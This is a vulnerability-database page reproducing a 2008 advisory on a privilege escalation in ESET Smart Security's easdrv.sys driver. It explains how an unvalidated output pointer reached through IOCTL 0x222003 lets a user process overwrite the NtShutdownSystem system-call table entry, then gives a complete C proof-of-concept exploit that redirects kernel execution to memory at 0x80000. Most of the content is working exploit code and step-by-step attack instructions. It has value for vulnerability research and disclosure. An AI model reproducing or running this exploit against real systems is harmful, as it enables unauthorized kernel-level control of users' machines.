Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

eset-escalate.txt

🗓️ 18 Aug 2008 00:00:00Reported by g_Type 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

ESET Smart Security 3.0.667.0 privilege escalation via easdrv.sys IoControlCode 0x222003. Missing input and output pointer validation can result in BSOD if pointing to kernel mode memory. Exploitation involves sending specific signals to easdrv and allocating memory for shellcode execution

Code
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
- - Orange Bat advisory -  
  
Name : ESET Smart Security 3.0.667.0  
Class : Privilage escalation  
Published : 2008-08-14  
Credit : g_ (g_ # orange-bat # com)  
  
- - Details -  
  
File: easdrv.sys  
  
.text:00012B92 loc_12B92:   
.text:00012B92 push [ebp+InputBuf]  
.text:00012B95 call ds:off_1A200[eax]  
.text:00012B9B mov ecx, [ebp+OutputBuffer]  
.text:00012B9E mov [ecx], eax  
  
Although this piece of code is wrapped with exception handler,   
input and output pointers are not checked with ProbeForRead/Write.  
This will cause BSOD when input/output will point to kernel mode  
memory (above 0x80000000).   
  
This code can be reached by sending IoControlCode = 0x222003 to   
device \\.\\easdrv (see POC). In order to exploit this, we need  
to take a look at   
  
.text:00012B95 call ds:off_1A200[eax]  
  
off_1A200 is:  
  
.rdata:0001A200 off_1A200 dd offset HookNtClose  
.rdata:0001A204 dd offset sub_12838  
.rdata:0001A208 dd offset sub_12874  
.rdata:0001A20C dd offset sub_128A8  
.rdata:0001A210 dd offset sub_128E4  
.rdata:0001A214 dd offset sub_1290A  
.rdata:0001A218 dd offset sub_1292C  
.  
.  
.  
  
These are wrappers for hooked syscalls. First one is NtClose, so  
there aren't many possible values that this API returns in eax.   
We will use:  
  
C0000008 STATUS_INVALID_HANDLE An invalid HANDLE was specified.  
  
Because it's the simplest status to get.   
  
Attack scenario:  
  
1. Get address of some rarely used syscall, like NtShutdownSystem.  
I will refer to this address as X :p  
2. Send signal to easdrv, with output buffer = X-1. This will result  
in overwriting two highest bytes with zeros and will damage 1 byte  
at X-1 :p.  
3. Send signal with output buffer = X+2. This will set two lower bytes  
to 0x0800.  
4. Allocate memory at 0x80000 and copy shellcode there  
5. Call NtShutdownSystem to jump to shellcode in r0 mode.  
  
See POC for details. There is no cleanup, you will get BSOD at address   
0x80000 :).  
  
It's possible to get required addresses by downloading symbols for   
given kernel build or use technique presented in [1]. In POC code this  
address is hardcoded.  
  
- - Proof of concept -  
  
http://www.orange-bat.com/adv/2008/poc.08.14.eset.rar  
  
Compile with mingw:  
  
gcc -o poc.exe poc.c -lntdll  
  
  
- - References -  
  
[1] - Exploiting Windows Device Drivers, Piotr Bania  
http://www.piotrbania.com/all/articles/ewdd.pdf  
  
- - PGP -  
  
All advisories from Orange Bat are signed. You can find our public  
key here: http://www.orange-bat.com/g_.asc  
  
- - Disclaimer -  
  
This document and all the information it contains is provided "as is",  
without any warranty. Orange Bat is not responsible for the  
misuse of the information provided in this advisory. The advisory is  
provided for educational purposes only.  
  
Permission is hereby granted to redistribute this advisory, providing  
that no changes are made and that the copyright notices and  
disclaimers remain intact.  
  
  
(c) 2008 www.orange-bat.com   
  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.9 (MingW32)  
  
iEYEARECAAYFAkimwoMACgkQIUHRVUfOLgXj5ACeNkg3GNU//dJRBZFvo/PpRr1C  
EZYAoJXU4zaonv7a4pOQi7qoINDaE7vV  
=7B2G  
-----END PGP SIGNATURE-----  
  
//  
// ESET SmartSecurity priv. escalation  
//  
// visit www.orange-bat.com for full advisory  
//  
// g_  
// g_ # orange-bat # com  
  
#include <windows.h>  
#include <stdio.h>  
#include <ddk/ntifs.h>  
  
  
void TextError(LPTSTR lpszFunction)  
{  
// Retrieve the system error message for the last-error code  
  
LPVOID lpMsgBuf;  
LPVOID lpDisplayBuf;  
DWORD dw = GetLastError();  
  
FormatMessage(  
FORMAT_MESSAGE_ALLOCATE_BUFFER |  
FORMAT_MESSAGE_FROM_SYSTEM |  
FORMAT_MESSAGE_IGNORE_INSERTS,  
NULL,  
dw,  
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),  
(LPTSTR) &lpMsgBuf,  
0, NULL );  
  
// Display the error message and exit the process  
  
lpDisplayBuf = (LPVOID)LocalAlloc(LMEM_ZEROINIT,  
(lstrlen((LPCTSTR)lpMsgBuf)+lstrlen((LPCTSTR)lpszFunction)+40)*sizeof(TCHAR));  
sprintf((LPTSTR)lpDisplayBuf,  
TEXT("%s failed with error %d: %s"),  
lpszFunction, dw, lpMsgBuf);  
//MessageBox(NULL, (LPCTSTR)lpDisplayBuf, TEXT("Error"), MB_OK);  
  
printf(lpDisplayBuf);  
  
LocalFree(lpMsgBuf);  
LocalFree(lpDisplayBuf);  
}  
  
  
BOOL TestIOCTL(PCHAR DeviceName, DWORD Ioctl, DWORD InputBuffer, DWORD InputLen, DWORD OutputBuffer, DWORD OutputLen )  
{  
HANDLE hDevice; // handle to the drive to be examined  
BOOL bResult; // results flag  
DWORD junk; // discard results  
IO_STATUS_BLOCK IoStatusBlock;  
  
hDevice = CreateFile(DeviceName,  
0, // no access to the drive  
FILE_SHARE_READ | // share mode  
FILE_SHARE_WRITE,  
NULL, // default security attributes  
OPEN_EXISTING, // disposition  
0, // file attributes  
NULL); // do not copy file attributes  
  
if (hDevice == INVALID_HANDLE_VALUE) // cannot open the drive  
{  
TextError("CreateFile");  
return (FALSE);  
}  
  
  
bResult = DeviceIoControl(hDevice, // device to be queried  
Ioctl,  
(PVOID)InputBuffer,  
InputLen,  
(PVOID)OutputBuffer,  
OutputLen, // output buffer  
&junk, // # bytes returned  
(LPOVERLAPPED)NULL); // synchronous I/O  
  
  
if(!bResult){  
TextError("DeviceIoControl");  
}  
  
CloseHandle(hDevice);  
  
return TRUE;  
}  
  
int AllocMem(DWORD lpBase){  
  
PVOID lpvResult;  
  
lpvResult = VirtualAlloc(  
(LPVOID) lpBase, // Next page to commit  
0x1337, // Page size, in bytes  
MEM_COMMIT, // Allocate a committed page  
PAGE_EXECUTE_READWRITE); // Read/write access  
if (lpvResult == NULL ){  
TextError("VirtualAlloc");  
return 0;  
}  
else {  
printf("VirtualAlloc success\n");  
}  
  
return 1;  
}  
  
int main(int argc, char *argv[])  
{  
DWORD Ioctl, Input, ILen, Output, OLen;  
DWORD SSDT;  
  
if(!AllocMem(0x80000)){  
return 1;  
}  
  
Input = 12345678;  
SSDT = 0x80501414; //80501414 8060786e nt!NtShutdownSystem  
  
Output = 0;  
if(TestIOCTL("\\\\.\\easdrv", 0x222003, &Input, 4, SSDT-1, 4)){  
TestIOCTL("\\\\.\\easdrv", 0x222003, &Input, 4, SSDT+2, 4);  
  
printf("NtShutdownSystem now points to 0x80000 :)");  
printf("Jump to hyperspace in 2 seconds..");  
Sleep(2*1000);  
NtShutdownSystem(0);  
}  
else{  
printf("Failed to open device");  
}  
  
return 0;  
}  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Aug 2008 00:00Current
7.4High risk
Vulners AI Score7.4
eset smart securityprivilege escalationeasdrv.sysiocontrolcodebsodkernel mode memoryexploitationsignalshellcode
25